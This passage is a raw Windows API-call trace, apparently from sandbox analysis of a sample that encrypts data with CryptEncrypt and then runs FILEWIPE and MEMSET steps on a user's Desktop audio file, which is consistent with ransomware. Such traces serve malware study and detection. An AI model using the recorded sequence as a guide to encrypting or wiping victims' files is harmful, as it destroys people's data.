wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.894] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1092e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x10930) returned 1 [0029.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.894] CharLowerBuffW (in: lpsz="byte[67889]", cchLength=0xb | out: lpsz="byte[67889]") returned 0xb [0029.894] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.895] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.895] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.895] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.896] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8e1b68*, pdwDataLen=0x6ae220*=0x1092e, dwBufLen=0x10930 | out: pbData=0x8e1b68*, pdwDataLen=0x6ae220*=0x10930) returned 1 [0029.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.896] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.896] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.897] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.897] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.897] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.897] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.897] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.897] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.897] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.897] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.897] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.897] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.900] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.901] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.902] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.902] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.902] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.902] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.903] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.903] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0029.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.903] CryptDestroyKey (hKey=0x7c2200) returned 1 [0029.903] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.903] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.903] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.903] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.903] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.903] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.903] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.903] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.903] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.904] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0029.904] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0029.904] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.904] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.904] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.904] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.904] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.904] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.904] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.904] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.904] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.904] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.904] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.904] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.904] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.905] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.905] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.905] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0029.905] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.905] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0029.905] FreeLibrary (hLibModule=0x754b0000) returned 1 [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.905] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0029.905] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.905] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.905] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.907] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.907] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.909] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.909] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0029.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0029.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.909] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bn6B0LdLyx0L0Guv_ Y.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a2ad60, ftCreationTime.dwHighDateTime=0x1d5c4e4, ftLastAccessTime.dwLowDateTime=0x28b50320, ftLastAccessTime.dwHighDateTime=0x1d5bf09, ftLastWriteTime.dwLowDateTime=0x28b50320, ftLastWriteTime.dwHighDateTime=0x1d5bf09, nFileSizeHigh=0x0, nFileSizeLow=0x1092e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Bn6B0LdLyx0L0Guv_ Y.m4a", cAlternateFileName="BN6B0L~1.M4A")) returned 0x7c2100 [0029.910] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.910] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.910] CharLowerBuffW (in: lpsz="byte[67886]", cchLength=0xb | out: lpsz="byte[67886]") returned 0xb [0029.911] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.911] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.911] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.911] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0029.911] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0029.911] FreeLibrary (hLibModule=0x76b40000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.913] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.913] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0029.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.913] PeekMessageW (in: lpMsg=0x6ae83c, 